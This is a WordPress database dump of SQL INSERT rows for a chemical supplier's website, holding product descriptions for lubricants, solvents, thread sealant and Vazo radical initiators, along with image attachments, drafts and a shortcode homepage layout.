INSERT INTO `wp_posts` VALUES (1799, 3, '2016-09-19 15:19:39', '2016-09-19 15:19:39', '', 'releasys-88-2', '', 'inherit', 'open', 'closed', '', 'releasys-88-2-2', '', '', '2016-09-19 15:19:39', '2016-09-19 15:19:39', '', 293, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/RELEASYS-88-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1801, 2, '2016-09-19 15:56:34', '2016-09-19 15:56:34', '<h3>Teflon Multi Use | High-performance general purpose lubricant with extreme corrosion and wear protection</h3>\r\nTeflon Multi-Use Lubricant is a water repelling, rust-resisting lubricant. Enhanced with Teflon™ fluoropolymer for optimum performance.\r\n<ul>\r\n 	<li>Features Teflon™ fluoropolymer for enhanced wear protection and lubricity.</li>\r\n 	<li>Contains calcium sulfonate for improved corrosion protection.</li>\r\n 	<li>Designed for general purpose use.</li>\r\n 	<li>Water-repelling silicone-free formula protects against rust.</li>\r\n 	<li>Formulated with Teflon™ fluoropolymer to deliver longer lubricant life, higher temperature stability, and better resistance to water and chemical contaminants.</li>\r\n 	<li>Provides extreme pressure wear protection.</li>\r\n 	<li>Resists extreme cold temperatures (to -30°F)</li>\r\n</ul>\r\n<strong>Ideal For Use in Applications Where:</strong>\r\n<ul>\r\n 	<li>Parts are exposed to extreme cold, hot or outdoor conditions.</li>\r\n 	<li>High moisture applications where other lubricants are quickly washed off.</li>\r\n 	<li>Parts need to be coated to prevent rust &amp; corrosion.</li>\r\n 	<li>High RPM chains like motorcycle, ATV, Go-Kart, etc</li>\r\n</ul>\r\n<h4><strong>Outstanding Features of Teflon Multi-Use:</strong></h4>\r\n<ul>\r\n 	<li>Exceptional anti-corrosion characteristics.</li>\r\n 	<li>Temperature Range: -30°F to +300°F.</li>\r\n 	<li>Provides superior anti-stick and EP properties.</li>\r\n 	<li>Outstanding adhesion and long lubricant life.</li>\r\n 	<li>Water repelling, protects against rust and corrosion.</li>\r\n 	<li>Contains no silicones.</li>\r\n 	<li>Non-staining film</li>\r\n</ul>\r\n<strong>Typical Applications:</strong>\r\n<ul>\r\n 	<li>Hinges</li>\r\n 	<li>Mechanical Chains</li>\r\n 	<li>Springs</li>\r\n 	<li>Cables</li>\r\n 	<li>Rollup Doors</li>\r\n 	<li>Sliding Tracks</li>\r\n 	<li>Pivots</li>\r\n 	<li>Cams and Pulleys</li>\r\n 	<li>Threaded Parts</li>\r\n 	<li>Conveyor Rollers</li>\r\n 	<li>Wheels, Windows</li>\r\n 	<li>Locks and Latches</li>\r\n 	<li>Hitches</li>\r\n 	<li>Winches</li>\r\n 	<li>Ramps</li>\r\n 	<li>Gates</li>\r\n 	<li>Tools</li>\r\n 	<li>Table Saws</li>\r\n</ul>\r\n<strong>Properties of Material</strong>\r\n\r\n<strong>Base Lubricant</strong>\r\nPerformance Grade Lubricating Wax\r\nPTFE (Polytetrafluoroethylene)\r\nSynthesized Calcium Stearate\r\nAnti-wear Additives\r\nRust &amp; Corrosion Inhibitors\r\n<strong>Appearance</strong>\r\nNearly clear\r\n<strong>Flash Point</strong>\r\nAerosol: not available\r\nBulk Liquid: not available\r\n<strong>NFPA Flammability Rating</strong>\r\n3 (Highly Flammable)\r\n\r\n<strong>Directions For Use</strong>\r\n<ol>\r\n 	<li>Provide adequate ventilation. Do not use near open flames.</li>\r\n 	<li>Shake or stir well before use to mix solids.</li>\r\n 	<li>Spray or brush the product on uniformly.</li>\r\n 	<li>For precision application use extension straw.</li>\r\n</ol>', 'Teflon Multi-Use', 'This light semi-dry lubricant features a calcium sulfonate thickener and Teflon fluoropolymer for enhanced wear and corrosion protection. Use to eliminate squeaks, prevent rust and protect moving parts.', 'publish', 'open', 'closed', '', 'teflon-multi-use', '', '', '2016-12-22 13:20:50', '2016-12-22 13:20:50', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1801', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1802, 2, '2016-09-19 15:56:06', '2016-09-19 15:56:06', '', 'Teflon Multi-Use', '', 'inherit', 'open', 'closed', '', 'teflon-multi-use-2', '', '', '2016-12-21 15:30:56', '2016-12-21 15:30:56', '', 1801, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-multi-use-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1803, 3, '2016-09-19 16:30:43', '2016-09-19 16:30:43', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1624"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-19 16:30:43', '2016-09-19 16:30:43', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1804, 3, '2016-09-19 16:46:05', '2016-09-19 16:46:05', '', 'h0805a', '', 'inherit', 'open', 'closed', '', 'h0805a-2', '', '', '2016-09-19 16:46:05', '2016-09-19 16:46:05', '', 1693, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/H0805A-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1805, 2, '2016-09-19 16:47:50', '2016-09-19 16:47:50', '', 'teflon-grease-ms-the', '', 'inherit', 'open', 'closed', '', 'teflon-grease-ms-the', '', '', '2016-09-19 16:47:50', '2016-09-19 16:47:50', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Teflon-Grease-MS-THE.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1806, 2, '2016-09-19 16:48:07', '2016-09-19 16:48:07', '', 'teflon-grease-ms-the-jar', '', 'inherit', 'open', 'closed', '', 'teflon-grease-ms-the-jar', '', '', '2016-09-19 16:48:07', '2016-09-19 16:48:07', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Teflon-Grease-MS-THE-JAR.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1807, 2, '2016-09-19 16:48:26', '2016-09-19 16:48:26', '', 'teflon-grease-ms-tht', '', 'inherit', 'open', 'closed', '', 'teflon-grease-ms-tht', '', '', '2016-09-19 16:48:26', '2016-09-19 16:48:26', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Teflon-Grease-MS-THT.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1808, 2, '2016-09-19 16:48:41', '2016-09-19 16:48:41', '', 'teflon-grease-ms-tmw', '', 'inherit', 'open', 'closed', '', 'teflon-grease-ms-tmw', '', '', '2016-09-19 16:48:41', '2016-09-19 16:48:41', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Teflon-Grease-MS-TMW.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1809, 2, '2016-09-19 16:48:58', '2016-09-19 16:48:58', '', 'teflon-grease-ms-tmw-jar', '', 'inherit', 'open', 'closed', '', 'teflon-grease-ms-tmw-jar', '', '', '2016-09-19 16:48:58', '2016-09-19 16:48:58', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Teflon-Grease-MS-TMW-JAR.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1810, 2, '2016-09-19 16:49:15', '2016-09-19 16:49:15', '', 'teflon-grease-ms-tss', '', 'inherit', 'open', 'closed', '', 'teflon-grease-ms-tss', '', '', '2016-09-19 16:49:15', '2016-09-19 16:49:15', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Teflon-Grease-MS-TSS.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1811, 2, '2016-09-19 16:51:51', '2016-09-19 16:51:51', '', 'teflon-grease-ms-twl', '', 'inherit', 'open', 'closed', '', 'teflon-grease-ms-twl', '', '', '2016-09-19 16:51:51', '2016-09-19 16:51:51', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Teflon-Grease-MS-TWL.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1812, 2, '2016-09-19 16:52:09', '2016-09-19 16:52:09', '', 'teflon-grease-ms-twl-aerosol', '', 'inherit', 'open', 'closed', '', 'teflon-grease-ms-twl-aerosol', '', '', '2016-09-19 16:52:09', '2016-09-19 16:52:09', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Teflon-Grease-MS-TWL-AEROSOL.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1813, 2, '2016-09-19 16:52:23', '2016-09-19 16:52:23', '', 'teflon-grease-ms-wlg-jar', '', 'inherit', 'open', 'closed', '', 'teflon-grease-ms-wlg-jar', '', '', '2016-09-19 16:52:23', '2016-09-19 16:52:23', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Teflon-Grease-MS-WLG-JAR.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1817, 2, '2016-09-19 16:53:30', '2016-09-19 16:53:30', '', 'teflon-grease-ms-tss_jar', '', 'inherit', 'open', 'closed', '', 'teflon-grease-ms-tss_jar', '', '', '2016-09-19 16:53:30', '2016-09-19 16:53:30', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Teflon-Grease-MS-TSS_JAR.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1818, 2, '2016-09-19 16:53:43', '2016-09-19 16:53:43', '', 'teflon-grease-ms-tss-jar', '', 'inherit', 'open', 'closed', '', 'teflon-grease-ms-tss-jar', '', '', '2016-09-19 16:53:43', '2016-09-19 16:53:43', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/Teflon-Grease-MS-TSS-JAR.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1819, 2, '2016-09-19 17:05:10', '2016-09-19 17:05:10', '<h3>Teflon Silicone Lubricant | Clean non-staining formula is safe for most plastic, rubber, vinyl, wood and metal</h3>\r\n<strong>Performance of Material</strong>\r\nOnce solvent carrier evaporates, the residual silicone coating will exhibit the following performance characteristics:\r\nViscosity at 25°C, approx. 350 mm/s\r\nFlash Point (closed cup), approx. &gt; 572°F (300°C)\r\nFreezing Point, approx. -58°F (-50°C)\r\nThermal Conductivity, approx. 0.16 W/m°C\r\nSurface Tension at 25°C, approx. 21.1 mN/m\r\nDielectric strength at 25°C, approx. 16 kV/mm\r\n\r\n<strong>Product Description</strong>\r\n\r\n• Performs in extreme temps from -40°F (-40°C) to 400°F (204°C).\r\n• Formulated with Teflon™ fluoropolymer to outperform other Silicone Sprays in both metal and non-metal applications.\r\n• Waterproofs, protects, lubricates and preserves rubber, plastic, vinyl, leather, metal &amp; wood. Seals out moisture.\r\n• Eliminates squeaking and binding in windows, conveyors, fan belts, hinges, locks, cables, etc. Good low tech mold release agent.\r\n• Helps prevent rust, oxidation and corrosion on all metals.\r\n• Helps prevent build up of glues, inks, paints, waxes, etc.\r\n• Protects O-rings, fishing gear, tools, and farm equipment from salt, chlorine and corrosives.\r\n• Prevents snow sticking and muddy buildups on shovels, snow plows, etc.\r\n• Clean, non-staining and odorless.\r\n• Good dielectric properties. Excellent lubricity.\r\n• Good resistance to high &amp; prolonged shear stress.\r\n• NSF H-2 Approved.\r\n\r\n<strong>Typical Applications of Teflon Silicone Lubricant:</strong>\r\n\r\n• Use on hinges, locks, latches, springs, plastic gears, rollers, drawer guides and other sliding parts. Conveyors, assemblies, heat sealers, cutting tables, slicing equipment, tools, dies, tuners, switches, fan belts &amp; rubber moldings. Waterproofs leather and protects vinyl.\r\n\r\n<strong>Directions For Use:</strong>\r\n\r\n1. Provide adequate ventilation. Do not use near open flames.\r\n2. Shake well before using.\r\n3. Either spray or brush on a light, even coat. Repeat for heavy-duty applications.\r\n\r\nNote: When waterproofing leather or sensitive materials test on an inconspicuous area.\r\nDo NOT use on floors or automotive pedals, MAY CAUSE SLIPPING OR FALLS.\r\n\r\n<strong>Properties of Material:</strong>\r\n\r\nBase Lubricant: Premium Grade Silicone Polymer, PTFE (Polytetrafluoroethylene)\r\nAppearance: Colorless, Odorless, Limpid Liquid\r\nFlash Point: Aerosol: 0°F (-18°C), Bulk Liquid: 15°F (-9°C)\r\nNFPA Flammability Rating: 3 (Highly Flammable)\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Teflon Silicone Lubricant', 'A clean, light-duty product, DuPont™ Silicone Lubricant with Teflon® Fluoropolymer is excellent for non-metal materials that may be damaged by conventional lubricants. It helps prevent sticking, binding and freezing.', 'publish', 'open', 'closed', '', 'teflon-silicone-lubricant', '', '', '2016-12-21 15:43:08', '2016-12-21 15:43:08', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1819', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1820, 2, '2016-09-19 17:05:43', '2016-09-19 17:05:43', '', 'Teflon Silicone Lubricant', '', 'inherit', 'open', 'closed', '', 'teflon-silicone-lubricant-3', '', '', '2016-12-21 15:40:54', '2016-12-21 15:40:54', '', 1819, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/teflon-silicone-lubricant-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1821, 2, '2016-09-19 17:09:24', '2016-09-19 17:09:24', '', 'ms-750', '', 'inherit', 'open', 'closed', '', 'ms-750-2', '', '', '2016-09-19 17:09:24', '2016-09-19 17:09:24', '', 1263, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-750-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1822, 2, '2016-09-19 17:16:14', '2016-09-19 17:16:14', '', 'ms-780', '', 'inherit', 'open', 'closed', '', 'ms-780-2', '', '', '2016-09-19 17:16:14', '2016-09-19 17:16:14', '', 1278, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-780-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1823, 2, '2016-09-19 17:25:06', '2016-09-19 17:25:06', '', 'ms-530n', '', 'inherit', 'open', 'closed', '', 'ms-530n-2', '', '', '2016-09-19 17:25:06', '2016-09-19 17:25:06', '', 1292, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-530N-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1824, 3, '2016-09-19 17:26:45', '2016-09-19 17:26:45', 'A strong cleaning agent ideally suited for removal of rosin, organic flux, oils, grease and waxes. It can be used for precision and specialty cleaning. Evaporates quickly and leaves no residue. It replaces n-PB and HCFC-225 in many applications.', 'MS-755L', '<p><strong>Removes Organic Flux, Oils, Grease and Wax.</strong></p><p>Our most aggressive cleaning agent for flux removal and heavy duty cleaning. It is suitable for removing ionic salts, organics flux, heavy industrial soils, wax and heavy grease. Evaporates quickly and leaves no residue. Low GWP (global warming potential).</p>', 'inherit', 'closed', 'closed', '', '1690-autosave-v1', '', '', '2016-09-19 17:26:45', '2016-09-19 17:26:45', '', 1690, 'https://132.148.10.86/wordpress/1690-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1825, 2, '2016-09-19 18:51:07', '0000-00-00 00:00:00', '', 'SDS', '', 'draft', 'closed', 'closed', '', '', '', '', '2016-09-19 18:51:07', '2016-09-19 18:51:07', '', 0, 'https://132.148.10.86/wordpress/?page_id=1825', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (1826, 3, '2016-09-19 18:56:56', '2016-09-19 18:56:56', '<img class="alignnone wp-image-1606" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/VAZO-FRS-article-800x533.jpg" alt="vazo-frs-article" width="732" height="488" />\r\n\r\nVazo FRS is a Miller-Stephenson exclusive product line of diazo-compounds designed to be used as radical initiators for a variety of polymerization, halogenations, addition, and crosslinking reactions.  Diazo-compounds decompose via photolysis or thermally to yield two free radicals per molecule and one equivalent of nitrogen gas.\r\n\r\n[caption id="attachment_1602" align="aligncenter" width="604"]<img class="wp-image-1602" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/Initiation_-_photolysis-800x114.png" alt="initiation_-_photolysis" width="604" height="86" /> Diagram 1: Photolysis of VAZO 64 (AIBN)[/caption]\r\n\r\nThe thermal decomposition temperature at which diazo-compounds will begin this process is dictated by the aliphatic chain and stability of the resultant nitrile-radical. Vazo compounds which have a low thermal decomposition temperature will be more reactive and generate more free radicals at a given temperature than a variant with a higher thermal decomposition threshold.  For the Vazo compounds, Vazo 64 (AIBN) has a 10hr half-life at 64 degrees Celsius, while Vazo 88 has a 10hr half-life at 88 degrees Celsius and so on.  To ease our customers to distinguish which Vazo variant will work for their synthetic pathway, the number associated each Vazo analogue indicates its 10hr half-life at that temperature.\r\n\r\nAnother widely used radical initiator are peroxides.  Peroxides can come as liquid or solid, depending on their chemical structure and, like diazo-compounds, will undergo thermal or light-induced decomposition to generate free radicals.  Peroxides are widely used for a variety of polymerization reactions, however they also have significant chemical and safety drawbacks, in comparison to Vazo FRS. Peroxides are extremely shock sensitive and can detonate on impact, they also can induce free radical decomposition, and are extremely temperature sensitive.  In comparison to the equivalent peroxide (based on similar half-lives) initiator, Vazo does not exhibit any of these dangerous safety concerns.  From a synthetic perspective, peroxides facilitate higher polydispersion, increased crosslinking and branching, higher viscosity, increased by-product formation, lower control on monomer distribution and high oxidation potential versus the equivalent Vazo initiator.  Moreover peroxides are extremely sensitive to heavy metal contamination, pH variation, additives, and solvent choice.  Vazo initiators experience non of these drawbacks, and maintains predictable reactivity independent of solvent choice, pH, contamination, and pigments.  Also, unlike peroxides, Vazo initiators are only mild oxidizing so polymerizations with oxidation-susceptible functionality can be performed.\r\n\r\nOf interest to any chemical engineer is the cost effectiveness of each reagent chosen for their process. In addition to polymerization control benefits, many Vazo FRS grades have low molecular weights.  On a cost per mol (e.g. cost per pound) basis, Vazo FRS are frequently <b>more </b><b>cost effective </b>than conventional organic peroxides.  Moreover Vazo variants come as safer, low-dust "noodle" forms. Vazo noodles present <b>minimal risk of dust blow back </b>during product addition, and are <b>easier </b><b>to handle </b>than typical granular products.\r\n\r\nFrom a reactivity, efficiency, cost-effectiveness, and most importantly safety aspect Vazo FRS is a clear improvement to any chemical process currently using peroxide-based initiators or engineers looking to use a safer and higher purity diazo-compound.', 'Vazo Free Radical Initiator: Benefits and Uses', '', 'inherit', 'closed', 'closed', '', '1601-revision-v1', '', '', '2016-09-19 18:56:56', '2016-09-19 18:56:56', '', 1601, 'https://132.148.10.86/wordpress/1601-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1828, 2, '2016-09-20 12:49:13', '2016-09-20 12:49:13', '', 'vazo-frs-product-banner', '', 'inherit', 'open', 'closed', '', 'vazo-frs-product-banner', '', '', '2016-09-20 12:49:13', '2016-09-20 12:49:13', '', 568, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/vazo-frs-product-banner.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1829, 2, '2016-09-20 12:51:31', '2016-09-20 12:51:31', '', 'VAZO 52', 'Vazo 52, known as 2-2\'-Azobis(2,4-dimethylvaleronitrile) is a free radical source (FRS) typically used as a polymerization initiator. Vazo 52 has the lowest initiation temperature within the Vazo product line. This product will thermally decompose to generate free radicals and nitrogen gas. Benefits of Vazo 52 include:\n<ul>\n 	<li>Ideal for low-temperature polymerization</li>\n 	<li>Does not compete in costly sides reactions</li>\n 	<li>Low polydispersity; monomer distribution control</li>\n 	<li>Unaffected by heavy metals, contamination, additives etc</li>\n 	<li>Can polymerize oxidation susceptible compound</li>\n</ul>\n\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'inherit', 'closed', 'closed', '', '568-autosave-v1', '', '', '2016-09-20 12:51:31', '2016-09-20 12:51:31', '', 568, 'https://132.148.10.86/wordpress/568-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1830, 2, '2016-09-28 14:03:17', '2016-09-28 14:03:17', 'Krytox TS4 Thread Sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 Thread Sealant can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly.Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.', 'TS4', '<p>Thread sealant (TS4) is unlike PTFE tape, which&nbsp;should be removed&nbsp;before re-application.&nbsp;Krytox TS4 can be&nbsp;re-applied over existing&nbsp;Krytox thread sealant.&nbsp;Clings to threads and will not shred or tear on&nbsp;assembly/disassembly.Cannot plug or restrict critical piping, valves, or&nbsp;instruments like tape solids.&nbsp;Krytox TS4 is non-reactive, non-toxic, nonflammable,&nbsp;non-corrosive and compatible with most seal, O-ring,&nbsp;and valve polymers.&nbsp;No VOC content or hydrocarbon in the product; safe for&nbsp;oxygen use with no auto-ignition temperatures.&nbsp;Tested leak free under helium at 400 psi for 7 days.*&nbsp;Safe for use: The&nbsp;Chlorine Institute&nbsp;(Pamphlet 164) rates&nbsp;Krytox lubricants a “1”.&nbsp;Lubricates threads,&nbsp;preventing costly thread&nbsp;damage from galling and&nbsp;seizing during assembly.&nbsp;Allows low breakaway&nbsp;torque for easy-to-break&nbsp;connections.</p><p><img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" data-mce-src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg"></p>', 'inherit', 'closed', 'closed', '', '989-autosave-v1', '', '', '2016-09-28 14:03:17', '2016-09-28 14:03:17', '', 989, 'https://132.148.10.86/wordpress/989-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1831, 3, '2016-09-20 13:09:51', '0000-00-00 00:00:00', '', 'MS-752U', '', 'draft', 'open', 'closed', '', '', '', '', '2016-09-20 13:09:51', '2016-09-20 13:09:51', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1831', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1832, 3, '2016-09-20 13:09:17', '2016-09-20 13:09:17', '', 'ms-752u', '', 'inherit', 'open', 'closed', '', 'ms-752u', '', '', '2016-09-20 13:09:17', '2016-09-20 13:09:17', '', 1831, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-752U.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1833, 3, '2016-09-20 13:09:41', '2016-09-20 13:09:41', '', 'ms-752u', '', 'inherit', 'open', 'closed', '', 'ms-752u-2', '', '', '2016-09-20 13:09:41', '2016-09-20 13:09:41', '', 1831, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-752U-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1834, 3, '2016-09-20 13:39:04', '2016-09-20 13:39:04', '', 'MS-752U', 'Miller-Stephenson offers an Ultrapure grade its most robust cleaning agent.  This solvent blend has been purified through a proprietary filtration and distillation process achieving sub ppm levels of particulates and non-volatile residues. MS-752U is a potent, precision cleaning agent used in variety of clean room operations or as a final rinse of parts in oxygen service. This product also can be used for precision and specialty applications in many industries such as Electronics, Military, Aerospace, Communications, and Clean rooms. It is ideally suited for removing mineral oil, vacuum oil, wax, heavy grease, cutting oil, stamping oil, hydraulic oil, gear oil, or as a final rinse.  Benefits include:\r\n<ul>\r\n 	<li>Sub ppm contaminate and particle levels</li>\r\n 	<li>Evaporates quickly; 100% non-flammable</li>\r\n 	<li>High cleaning efficiency (Kb value)</li>\r\n 	<li>Approved by major aerospace and gas manufactures</li>\r\n 	<li>Non-ozone depleting; RoHS compliant</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'ms-752u', '', '', '2017-04-13 16:13:15', '2017-04-13 16:13:15', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1834', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1835, 3, '2016-09-20 13:10:45', '2016-09-20 13:10:45', '', 'ms-752u', '', 'inherit', 'open', 'closed', '', 'ms-752u-3', '', '', '2016-09-20 13:10:45', '2016-09-20 13:10:45', '', 1834, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/MS-752U-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
